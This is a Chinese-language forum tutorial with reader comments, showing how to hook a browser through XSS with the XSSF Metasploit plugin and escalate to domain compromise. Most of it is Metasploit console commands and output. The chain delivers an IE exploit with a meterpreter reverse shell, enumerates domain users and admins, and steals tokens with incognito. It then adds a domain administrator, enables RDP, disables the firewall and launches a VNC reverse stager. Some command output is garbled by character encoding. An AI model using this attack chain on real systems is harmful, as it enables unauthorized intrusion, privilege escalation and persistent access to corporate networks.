xss渗透之初级入侵域
xss渗透之初级入侵域
作者:j8g
备注:0xSafe Team 首发
转载请注明以上内容。
【0x01】准备工作
【0x02】开始配置xssf
【0x03】结束
正文:
1。准备工作
开始之前,我们进入ubuntu系统
或者进入
需要等一会
进入失败后,可以查看这个配置文件,里面有配置信息,(路径+文件)
接下里看见这个了。
在这里面下载https://code.google.com/p/xssf/downloads/list
下图cp到msf3里面
msf > xssf_urls //默认的地址
[+] XSSF Server : 'http://192.168.1.109:8888/' or 'http://<PUBLIC-IP>:8888/'
[+] Generic XSS injection: 'http://192.168.1.109:8888/loop' or 'http://<PUBLIC-IP>:8888/loop'
[+] XSSF test page : 'http://192.168.1.109:8888/test.html' or 'http://<PUBLIC-IP>:8888/test.html'
[+] XSSF Tunnel Proxy : 'localhost:8889' //代理
[+] XSSF logs page : 'http://localhost:8889/gui.html?guipage=main' //xssf页面
[+] XSSF statistics page: 'http://localhost:8889/gui.html?guipage=stats'
[+] XSSF help page : 'http://localhost:8889/gui.html?guipage=help'
我们打开xssf gui log页面 看看
现在没有xss的机器
然后看结果
msf > xssf_victims
Victims
=======
id xssf_server_id active ip interval browser_name browser_version cookie
-- -------------- ------ -- -------- ------------ --------------- ------
3 2 true 192.168.1.104 5 Internet Explorer 6.0 NO
接下来我们alert下。
msf > use auxiliary/xssf/public/misc/alert
msf auxiliary(alert) > show options
Module options (auxiliary/xssf/public/misc/alert):
Name Current Setting Required Description
---- --------------- -------- -----------
AlertMessage XSSF ALERT ! yes Message you want to send to the victim.
SRVHOST 192.168.1.109 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VictimIDs ALL yes IDs of the victims you want to receive the code.\nExamples : 1, 3-5 / ALL / NONE
msf auxiliary(alert) > run
Auxiliary module execution started, press [CTRL + C] to stop it !
Using URL: http://192.168.1.109:8080/9ERUPi
[+] Remaining victims to attack: [3 (1)]
[+] Code 'auxiliary/xssf/public/misc/alert' sent to victim '3'
[+] Remaining victims to attack: NONE
效果是这样的。我们继续看下一步,我们挂xss木马。
下面就用xssf_exploit得到shell了。
msf exploit(ms11_050_mshtml_cobjectelement) > use exploit/windows/browser/ms12_004_midi
msf exploit(ms12_004_midi) > show options
Module options (exploit/windows/browser/ms12_004_midi):
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms12_004_midi) > set SRVHOST 192.168.1.109
SRVHOST => 192.168.1.109
msf exploit(ms12_004_midi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms12_004_midi) > show options
Module options (exploit/windows/browser/ms12_004_midi):
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 192.168.1.109 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms12_004_midi) > set LHOST 192.168.1.109
LHOST => 192.168.1.109
msf exploit(ms12_004_midi) > exploit
Exploit running as background job.
[-] Handler failed to bind to 192.168.1.109:4444
[-] Handler failed to bind to 0.0.0.0:4444
[-] Exploit failed: Rex::AddressInUse The address is already in use (0.0.0.0:4444).
msf exploit(ms12_004_midi) > set LPORT 4321
LPORT => 4321
msf exploit(ms12_004_midi) > exploit
Exploit running as background job.
Started reverse handler on 192.168.1.109:4321
Using URL: http://192.168.1.109:8080/2lGeYy
Server started.
msf exploit(ms12_004_midi) >
我们用ms12_040_midi木马。
已知jobs是
sf exploit(ms12_004_midi) > jobs
Jobs
====
Id Name
-- ----
0 Exploit: windows/browser/ms11_050_mshtml_cobjectelement
2 Exploit: windows/browser/ms12_004_midi
接下来就是
3代表xssf_victim的id 2 代表jobs的号码
OK 我们得到一个shell了。
看日志
运行的都在里面,加载了什么,都在里面。
^C[-] Exploit interrupted by the console user
msf exploit(ms12_004_midi) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 9SEC\Administrator @ C0DEPAY-XP 192.168.1.109:4321 -> 192.168.1.104:8077 (192.168.128.130)
msf exploit(ms12_004_midi) > sessions -i 1
Starting interaction with 1...
meterpreter >
得到Shell了。
获得系统的hash,可以去网站破解。
http://www.objectif-securite.ch/en/ophcrack.php
进入系统
看工作机器
C:\Documents and Settings\Administrator.9SEC\����>cd \
cd \
C:\>net view
net view
���������� ע�
-------------------------------------------------------------------------------
\\AAA
\\BBB
\\C0DEPAY-XP
\\YHZR
�����ɹ����ɡ�
看是不是存在域!
看看是不是存在域
C:\>net view /domain
Domain
----------------------------
9SEC
�����ɹ����ɡ�
存在域,ok,我们继续看怎么渗透域。IP地址,MAC地址,都可以看见,网关都可以看见。
继续看。
看看缓存表里 有关联的IP
C:\>arp -a
arp -a
Interface: 192.168.128.130 --- 0x2
Internet Address Physical Address Type
192.168.128.2 00-50-56-f7-13-c5 dynamic
192.168.128.3 00-0c-29-49-10-a6 dynamic
不仅仅是这些,还有的。接下来看。
看域管理员
C:\>net localgroup administrators
net localgroup administrators
���� administrators
ע�� ����Ա�Լ�����/���в������Ƶ���ȫ����Ȩ
��Ա
-------------------------------------------------------------------------------
9SEC\Domain Admins
Administrator
�����ɹ����ɡ�
C:\>
我们给开启3389,或者vnc登陆。
meterpreter > run getgui -e
Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
Carlos Perez [email protected]
Enabling Remote Desktop
RDP is disabled; enabling it ...
Setting Terminal Services service startup mode
The Terminal Services service is not set to auto, changing it to auto ...
Opening port in local firewall if necessary
For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20130123.0735.rc
meterpreter >
开启了3389.我们连接
我们可以net stop sahredaccess关闭防火墙,然后
开启VNC
。
接下来,看其他机器,我们通过
C:\>net view
net view
���������� ע�
-------------------------------------------------------------------------------
\\AAA
\\BBB
\\C0DEPAY-XP
\\YHZR
�����ɹ����ɡ�
得到机器的名字
BBB也是这样得到IP地址
192.168.128.3 \\AAA
192.168.128.4 \\BBB
192.168.128.130 \\C0DEPAY-XP
192.168.128.6 \\YHZR
Ok得到所有IP了。
接下来获得域中的用户。,
C:\Documents and Settings\Administrator.9SEC\����>net user /domain
net user /domain
�������������� 9sec.com ����������������
\\AAA.9sec.com ���û��ʻ�
-------------------------------------------------------------------------------
Administrator Guest IUSR_AAA
IWAM_AAA krbtgt SUPPORT_388945a0
swg
�����ɹ����ɡ�
得到域中的组
C:\Documents and Settings\Administrator.9SEC\����>net group "domain admins" /domain
net group /domain
�������������� 9sec.com ����������������
Administrator
�����ɹ����ɡ�
得到域中的管理员
C:\Documents and Settings\Administrator.9SEC\����>net localgroup administrators /domain
net localgroup administrators /domain
�������������� 9sec.com ����������������
���� administrators
ע�� ����Ա�Լ�����/���в������Ƶ���ȫ����Ȩ
��Ա
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
�����ɹ����ɡ�
C:\Documents and Settings\Administrator.9SEC\����>
然后就是下一步入侵了。
use incognito
加载incognito功能(用来盗窃目标主机的令牌或假冒用户)
meterpreter > use incognito
Loading extension incognito...success.
meterpreter >
list_tokens -u
列出目标主机用户的可用令牌。
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
9SEC\Administrator
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter >
然后就是。,
impersonate_token DOMAIN_NAME\\USERNAME
假冒目标主机上的可用令牌。
成功了。
Ok 了、、、
添加了一个域的管理员
进这台机器
出现这个
因为没有默认添加进入的账户,我们可以这样做。。。
C:\Documents and Settings\Administrator.9SEC\����>net localgroup administrators admin /add /domain
net localgroup administrators admin /add /domain
�������������� 9sec.com ����������������
����ϵͳ���� 1378��
�����ʻ������DZ������ij�Ա��
C:\Documents and Settings\Administrator.9SEC\����>net localgroup "Remote Desktop Users" admin /add /domain
net localgroup "Remote Desktop Users" admin /add /domain
�������������� 9sec.com ����������������
�����ɹ����ɡ�
C:\Documents and Settings\Administrator.9SEC\����>exit
exit
[-] core_channel_write: Operation failed: The handle is invalid.
meterpreter > run vnc
Creating a VNC reverse tcp stager: LHOST=192.168.1.109 LPORT=4545)
Running payload handler
VNC stager executable 73802 bytes long
再看看
域的另一个机器
所有域上的机器
如何判断哪台是域控呢,看DNS Servers
3。结束
xssf文章结束了。里面还有些不好的。希望指出来。
关于作者
评论45次
感觉有点YY。。。
谢谢啊。图文并茂,这下学xi起来容易了。
incognito还是很好用的
不懂xxs的人飘过。
好文。但是,现实永远是残酷的
不错,在xss里直接加载IE的ms漏洞,直接干掉管理员的电脑。什么都有了
谢谢分享,文章挺好的。
各路大神多发点教程
学xi下思路
理论大于实际,完全暴露在公网上的机器太少了。 作为教材还是很经典的
纪录学xi
xss居然还可以这样玩吖。。。
感谢分享
xss只是攻击pc的一种方式 然后才渗透 不过msf很强大哈
看的有些辛苦的说
理想化了,不过可以当科普文
mark下,好好学xi下~
利用起来有点麻烦。还要自己搭框架。
好详细, 楼主辛苦了..
没0DAY搞毛。。